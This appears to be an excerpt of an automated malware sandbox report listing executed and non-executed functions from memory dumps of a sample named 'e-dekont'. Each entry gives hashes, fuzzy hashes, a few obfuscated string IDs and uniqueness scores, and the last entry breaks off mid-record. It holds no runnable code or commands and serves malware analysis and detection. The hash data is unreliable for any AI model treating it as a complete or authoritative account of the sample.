                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1659615917.0000000000DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DDD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_ddd000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                        • Instruction ID: 869742a4e2865c4c4471483a68d804dcdb95621a3e09d267ab1b5fa4299938dc
                                                        • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                        • Instruction Fuzzy Hash: 9311AF76504240DFCF16CF10D5C4B16BF62FB94314F28C5AAD8094B656C336D85ACBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F7AC4 Relevance: .1, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 98b60be229deda7f196fed56226b6bb51b455021cc72fb14b518d249aacac629
                                                        • Instruction ID: cf7665de56feb42b04f1577408757ab9e81d8ccb0f9857efda636654c3a43b3f
                                                        • Opcode Fuzzy Hash: 98b60be229deda7f196fed56226b6bb51b455021cc72fb14b518d249aacac629
                                                        • Instruction Fuzzy Hash: BF2103B59003499FCB10DFAAD884ADEFBF4FB48350F10841AE959A7320C374A954CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00DED1AF Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1659667959.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_ded000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                        • Instruction ID: 363ce6a89a2bd9eda01fbed5706de9fea7acebf53ec901a5ad83054bd05cdebb
                                                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                        • Instruction Fuzzy Hash: 7A119D75504280DFDB06DF14D5C4B15BFA2FB84318F28C6AAD9494B696C33AD84ACBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00DED367 Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1659667959.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_ded000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                        • Instruction ID: e258720feec6041dc39e1e24827d9ff257b02361c4ee4e22e0167adcf462b2b0
                                                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                        • Instruction Fuzzy Hash: 1B11DD75504280CFCB02DF14D5C4B15BFB2FB94318F28C6AED8094B696C33AE84ACB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073FFB98 Relevance: .0, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c60c3bc51ca2da36122f5744a3535753afc7d68aa636145d15f8111216958044
                                                        • Instruction ID: f393f02fc716e41e31e9921511960bd0e7e2161ce2b0029dbce80d43dede88e0
                                                        • Opcode Fuzzy Hash: c60c3bc51ca2da36122f5744a3535753afc7d68aa636145d15f8111216958044
                                                        • Instruction Fuzzy Hash: 6211F7B4E0820ADFDB04DFA9C5419ADBBF9FB49350F1095959918A7315D770AA418F80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F51D8 Relevance: .0, Instructions: 42COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 01f58fb5cdf89ca98d9a64b82c6d8e8c388bb148be8fe9ef9faa5cbd353e24af
                                                        • Instruction ID: a5cb510c98c1d4f936b8583fea0c47a8356c429f8ae03df4c92ddabafbc01f27
                                                        • Opcode Fuzzy Hash: 01f58fb5cdf89ca98d9a64b82c6d8e8c388bb148be8fe9ef9faa5cbd353e24af
                                                        • Instruction Fuzzy Hash: 73010875E04208AFD705DFA9C484A9DBFF1AF49310F09C0D6E8089B362DA309A50CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073FB06A Relevance: .0, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f7e45e43d15a5d8aab22772bc6a3685cf4a2e0b4bfee032dde3574f856572ef3
                                                        • Instruction ID: a3fffbd7e4f1a66de6b32947cf4b2c68f55649c2b4aaeb46da43117cb2ef4d99
                                                        • Opcode Fuzzy Hash: f7e45e43d15a5d8aab22772bc6a3685cf4a2e0b4bfee032dde3574f856572ef3
                                                        • Instruction Fuzzy Hash: C1F0BEB2604108AFEF05DF64DD40CAABFAADF05254B0481ABF148D7321E631EA508BA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F51E8 Relevance: .0, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 48fbf908780e3d1d7dc6788be584ab1f618b0bc387b63da6e50bd59d1b280177
                                                        • Instruction ID: aef35f4f325c589420874a47b258d32fa1fbe3ceca9155f42fc2a11f1c0ecfbd
                                                        • Opcode Fuzzy Hash: 48fbf908780e3d1d7dc6788be584ab1f618b0bc387b63da6e50bd59d1b280177
                                                        • Instruction Fuzzy Hash: D001B274E00208AFCB04DFA9C589A9DFFF2EF88300F45C1A5A8089B365DB34AA50CF40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073FC060 Relevance: .0, Instructions: 33COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3aa79f652431c4ccd95cd7f8899f8084fdd9426e37a3e1e847b9287ebd25dbf2
                                                        • Instruction ID: c1fa54e90d00dd2c2608d40ce0f1e50ef47a5283d3d8e35145adfb23742d68d2
                                                        • Opcode Fuzzy Hash: 3aa79f652431c4ccd95cd7f8899f8084fdd9426e37a3e1e847b9287ebd25dbf2
                                                        • Instruction Fuzzy Hash: CCF0C2B495434AAFDB14CF68C801AEEBFF4EB05224F04859DE615E7241D7359107CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073FC070 Relevance: .0, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f1705aca3b330d317b0a14bf3fd016fe4ec5471847d6efdd885aa734864c9771
                                                        • Instruction ID: 398d8eaf60d6da123851461af412b7e5cd138fbc17ba0c2c43059633a554a739
                                                        • Opcode Fuzzy Hash: f1705aca3b330d317b0a14bf3fd016fe4ec5471847d6efdd885aa734864c9771
                                                        • Instruction Fuzzy Hash: ACF0DAB0D4420E9FDB54DFA9C841AAEBBF4FB48200F1085A9EA18E7200D7759546CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073FC009 Relevance: .0, Instructions: 20COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 451af5f513733d52f978fd6ca27731fa04677f7aeaf828dfbc2623b07256cc69
                                                        • Instruction ID: 6e14f0872270fdb3014308a2fa1aef1eb26738dd620a96fc1fe0f4d823259119
                                                        • Opcode Fuzzy Hash: 451af5f513733d52f978fd6ca27731fa04677f7aeaf828dfbc2623b07256cc69
                                                        • Instruction Fuzzy Hash: 6CE022B59542499FE720CF39C400ACA7FF0AF05228F24C1AAE019DB692D774C106CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F41FC Relevance: .0, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ee06addd4ebe4c7bb5eee5583e6299fa5cca0f754c4db5a04c152172192e2848
                                                        • Instruction ID: a8490b247bc880a611bf267bf269e663b9380d30ab9f07ca23c8d83d346133b6
                                                        • Opcode Fuzzy Hash: ee06addd4ebe4c7bb5eee5583e6299fa5cca0f754c4db5a04c152172192e2848
                                                        • Instruction Fuzzy Hash: C7E08CF4626344CFD718CFA0C0458987F76FF8A391BA114A9E14B9BA68C739E8C1CE40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073FC018 Relevance: .0, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ac9e4c588885e51756ac7b1af892ec7d8b501f669ab6cad50064d23a6bc484ab
                                                        • Instruction ID: b98554a9ad66bdaadb70462cb3514e79a7b8c86ec8b00db4de49567c63907cfe
                                                        • Opcode Fuzzy Hash: ac9e4c588885e51756ac7b1af892ec7d8b501f669ab6cad50064d23a6bc484ab
                                                        • Instruction Fuzzy Hash: 14E092F0D4020A9FD740EFA9C905A9EBBF4AF08600F1189A9D119E7211E77496058F91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F4184 Relevance: .0, Instructions: 16COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4559d7f1e90e3165ebdfd14ed6deb24139968b29bb98159cc7edc4b1bb4fcd02
                                                        • Instruction ID: 8dd3fb466348dad7161cbcef71162559abe78f3c2b8c856c2afb2ecf7a587d94
                                                        • Opcode Fuzzy Hash: 4559d7f1e90e3165ebdfd14ed6deb24139968b29bb98159cc7edc4b1bb4fcd02
                                                        • Instruction Fuzzy Hash: E1E0C2B4512304CFCB58DFA0C449589BB74FF89380B9004A9D81ACF2ADD33A99C1CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F9560 Relevance: .0, Instructions: 13COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4ada4aa6756d8d8d8ebc2a65dbe124b401d04a2d55fb58b478bfbe574e067fbd
                                                        • Instruction ID: e5bf27aa4ca7d1fa18fc727e9211026dddea173f78516a185cd0df4a50cd8f5f
                                                        • Opcode Fuzzy Hash: 4ada4aa6756d8d8d8ebc2a65dbe124b401d04a2d55fb58b478bfbe574e067fbd
                                                        • Instruction Fuzzy Hash: 67D0C9A640D280AEC703A7A0C9548D57FB17F1B62034994C3D2844A0339B21862ED793
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F1DC8 Relevance: .0, Instructions: 13COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4247a555912c965be1d15f0ae96224d7b7ff0f6abd652fb532ee15399e7dab14
                                                        • Instruction ID: 4b29d9ef5ab9095ec8388d7a5e3ee3599026738d6ab14d83f3f7ca657593663e
                                                        • Opcode Fuzzy Hash: 4247a555912c965be1d15f0ae96224d7b7ff0f6abd652fb532ee15399e7dab14
                                                        • Instruction Fuzzy Hash: E5C012B1501308DFC344EAB5B40965576BBE745251F804195B409D3180EB7515509651
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F2435 Relevance: .0, Instructions: 12COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9fcdcb4e4eda94e453ede994ae732dfd07e45f7a5d631005a1116b735e77b2b7
                                                        • Instruction ID: 3e00436072e078c9dede6d32026b5850a5222139d232f257776b70ddbe5c31cf
                                                        • Opcode Fuzzy Hash: 9fcdcb4e4eda94e453ede994ae732dfd07e45f7a5d631005a1116b735e77b2b7
                                                        • Instruction Fuzzy Hash: CED01770D06219CFCB88DB24DE80B8CB7BAEB84200F10D6A5D009A7264DA705E89CF14
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073FAC40 Relevance: .0, Instructions: 12COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d129cc54c6ac5dff486283a10a3c661d4d6fbad1492c35dcee55bf74197340d9
                                                        • Instruction ID: d975eb9d25aa1a403dc54a3d6ecf2b1c4df0f6e209bce959456a298ff61c3907
                                                        • Opcode Fuzzy Hash: d129cc54c6ac5dff486283a10a3c661d4d6fbad1492c35dcee55bf74197340d9
                                                        • Instruction Fuzzy Hash: 06D0C91508AAC1A9D31307B858168E1BF306E962007198183D7C450852B7242AF8E3A7
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F195A Relevance: .0, Instructions: 12COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9ee4029e74065cdb1e92fdca9dc3439a5fccd8e83a4ad4c662dccf886483ea9f
                                                        • Instruction ID: 27aa9afc9c142e94d8c1be387e5302a2aaacf8022e5a2d9061a760e6e37570ea
                                                        • Opcode Fuzzy Hash: 9ee4029e74065cdb1e92fdca9dc3439a5fccd8e83a4ad4c662dccf886483ea9f
                                                        • Instruction Fuzzy Hash: 9BD0C9D2A097C45FC307977495140412FA5BFDB240B9A40D6C081DB6EBDA2A5956CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F3F65 Relevance: .0, Instructions: 11COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d35636f1cedcda1ca20245cafa5f4bf0aa18a1f0e6cee582452e386cc40843ef
                                                        • Instruction ID: b30f2ee6f6a35983983f9d2354461d3fe6aecbf72ad298ab09f928a00f7909a8
                                                        • Opcode Fuzzy Hash: d35636f1cedcda1ca20245cafa5f4bf0aa18a1f0e6cee582452e386cc40843ef
                                                        • Instruction Fuzzy Hash: C5D092B4A12249CFC718CFA1D684889BBB6AF8A341F615659D00AAB268C734DE81CE50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073FE718 Relevance: .0, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ffafbdeb706a385bc071c7376d9d7df405609dec5bc569e0efb96d8653b9c093
                                                        • Instruction ID: 3b92b77bbe93156e68da31f2e6c2854fe658371c4a235dfacf9d05ca144646c7
                                                        • Opcode Fuzzy Hash: ffafbdeb706a385bc071c7376d9d7df405609dec5bc569e0efb96d8653b9c093
                                                        • Instruction Fuzzy Hash: 94C08C70062305CBD30827A8B80E3647768AB80742F880010A20C114B08AB81880CF31
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F76F3 Relevance: .0, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5d4ca51d5795e3601622076444448794c0b7ec3284a7fdbe167a8de9bcb19d66
                                                        • Instruction ID: e6e06e109c068c36bca6117291c9f222c26b0cffaeb9cd42b540f2de1ec5e40f
                                                        • Opcode Fuzzy Hash: 5d4ca51d5795e3601622076444448794c0b7ec3284a7fdbe167a8de9bcb19d66
                                                        • Instruction Fuzzy Hash: D0C08CFA020000EEDA01A7208A40C65BB94FB46340B408852E20D86434C730C51CDB02
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F7A6C Relevance: .0, Instructions: 8COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a585633cfb2b4c3bf9ba659340ef852d698011cefd87acc968f49777f1f4cff1
                                                        • Instruction ID: 95a04b170565b1a783775ef06a9fd83b3a8d6941be457c987b3ee0685cbea1c5
                                                        • Opcode Fuzzy Hash: a585633cfb2b4c3bf9ba659340ef852d698011cefd87acc968f49777f1f4cff1
                                                        • Instruction Fuzzy Hash: 1CB012F91B6180FAF80467686B4492ADA00EBA3740F41CC11B74DE0654853084A8952F
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 073FC310 Relevance: 5.3, Strings: 4, Instructions: 259COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: T+-q$[V~*$[V~*$]\`
                                                        • API String ID: 0-1849991408
                                                        • Opcode ID: 9d51b0516f5ec2fc6848576b5204bb548da692e1ea6a57d9bfc54424c9d2f2d0
                                                        • Instruction ID: fe951ee6f6b8b7abdb62ea02dfc4293145169177453b7a4a5169d41041ab4762
                                                        • Opcode Fuzzy Hash: 9d51b0516f5ec2fc6848576b5204bb548da692e1ea6a57d9bfc54424c9d2f2d0
                                                        • Instruction Fuzzy Hash: 59B1F7B0E55219DBDB04CFAAD58089EFBF6FF89380F14E52AD519AB318D33499018F64
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073FC301 Relevance: 4.0, Strings: 3, Instructions: 257COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: T+-q$[V~*$]\`
                                                        • API String ID: 0-3978741314
                                                        • Opcode ID: 55ed07e735b3888d895533b5d1909bc8c7012c42946ab00d98793e299becae13
                                                        • Instruction ID: 4c2dcc5e728dd18c50a391053f6da7d88414d22e3cfa6e435a4083349532ddff
                                                        • Opcode Fuzzy Hash: 55ed07e735b3888d895533b5d1909bc8c7012c42946ab00d98793e299becae13
                                                        • Instruction Fuzzy Hash: 3DB118B0E55219DBDB04CFAAD98089EFBF2BF89340F14E52AD419EB319D33499018F64
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073FC4CC Relevance: 4.0, Strings: 3, Instructions: 201COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: T+-q$[V~*$]\`
                                                        • API String ID: 0-3978741314
                                                        • Opcode ID: ad7556292f9ccc0755539e7af1a0d81226aa5afe63ce0bbb6910c1718f0b4d07
                                                        • Instruction ID: 76764af31a2f63f5379aedc21c25484943086577ced510a38b169c32d1f39711
                                                        • Opcode Fuzzy Hash: ad7556292f9ccc0755539e7af1a0d81226aa5afe63ce0bbb6910c1718f0b4d07
                                                        • Instruction Fuzzy Hash: B78158B0E6521DDBDB04CFAAD98089EFBB2FF89380F10A516D519B7318D33499018F64
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F318A Relevance: 3.9, Strings: 3, Instructions: 161COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 7Z/t$RWIK$[[bb
                                                        • API String ID: 0-1157992699
                                                        • Opcode ID: 4937d3cad1c4e6f06fa8f0bb66b196e2980e33b4e1495425cc161a8e25146ea2
                                                        • Instruction ID: f0f2abca0799732cf4d1ca9629b9074b2b9b95015c3b0bcdb423f7b7241bc17f
                                                        • Opcode Fuzzy Hash: 4937d3cad1c4e6f06fa8f0bb66b196e2980e33b4e1495425cc161a8e25146ea2
                                                        • Instruction Fuzzy Hash: 1B6126B0E1560ADFDB08CFAAC8415AEFFF2BF89350F14D06AD519A7264D7348A418F94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F2BE1 Relevance: 2.7, Strings: 2, Instructions: 247COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4$4
                                                        • API String ID: 0-209682765
                                                        • Opcode ID: 430d21fe9f4f53ccb836700fa2b2eea690c03050513b7ba4c527d4d7f6921494
                                                        • Instruction ID: 6c48f40e0cef2f719b26bb283b2ab0e79b35144e41fc22aba190d77bf6a58819
                                                        • Opcode Fuzzy Hash: 430d21fe9f4f53ccb836700fa2b2eea690c03050513b7ba4c527d4d7f6921494
                                                        • Instruction Fuzzy Hash: 98B13DB4E11219DFDB44DFA8D940A9EFBB2FF88300F108626D519AB355DB30A946CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F1DF0 Relevance: 1.3, Strings: 1, Instructions: 80COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0
                                                        • API String ID: 0-4108050209
                                                        • Opcode ID: 3ab8bbf4bc0060c440f49135b40958fc4dd9616839179c013e733d0d71e394a1
                                                        • Instruction ID: 8c46604c2a94a0be2d6f5716f9f4a9019bd407d481abbd1ca980ba79d3a85bf9
                                                        • Opcode Fuzzy Hash: 3ab8bbf4bc0060c440f49135b40958fc4dd9616839179c013e733d0d71e394a1
                                                        • Instruction Fuzzy Hash: EF3118B1E05618DBEB18CFABD8407DEFBF3AFC9200F14C0AAD508A6254EB341A458F51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 076130D0 Relevance: .3, Instructions: 317COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 927f5d63ba18ffb353282af1d97dbdb70483210272aa5bce89460c6f683a25af
                                                        • Instruction ID: b4ba4fe1232b718b43fb83cde56941e1c592a433c0e6cb08d874eb637639361b
